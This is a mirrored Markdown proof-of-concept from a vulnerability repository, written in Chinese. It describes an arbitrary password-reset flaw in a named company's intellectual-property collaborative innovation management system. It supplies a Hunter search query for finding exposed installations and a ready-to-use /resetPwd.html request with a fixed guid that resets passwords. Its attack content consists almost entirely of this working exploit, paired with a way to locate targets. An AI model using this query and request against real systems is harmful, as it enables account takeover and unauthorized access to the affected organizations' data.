mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-08 11:57:27 +00:00
25 lines
954 B
Markdown
25 lines
954 B
Markdown
|
|
# 大为计算机软件开发有限公司知识产权协同创新管理系统任意密码重置
|
||
|
|
|
||
|
|
# 一、漏洞简介
|
||
|
|
大为计算机软件开发有限公司知识产权协同创新管理系统存在任意密码重置漏洞
|
||
|
|
|
||
|
|
# 二、影响版本
|
||
|
|
+ 大为计算机软件开发有限公司知识产权协同创新管理系统
|
||
|
|
|
||
|
|
# 三、资产测绘
|
||
|
|
+ hunter`web.body="大为计算机软件开发有限公司"`
|
||
|
|
+ 特征
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
# 四、漏洞复现
|
||
|
|
```plain
|
||
|
|
/resetPwd.html?guid=IWBI9HveWf01GlDm+je0Ec+qvHyI7F5bjy3kRC2uESwC0+KPmTxUsgHqj+lUuY0F061yruzA+jkZFb9hhNqPhw%3D%3D
|
||
|
|
```
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
> 更新: 2024-02-29 23:55:47
|
||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rmi9xpgr32bsz4aq>
|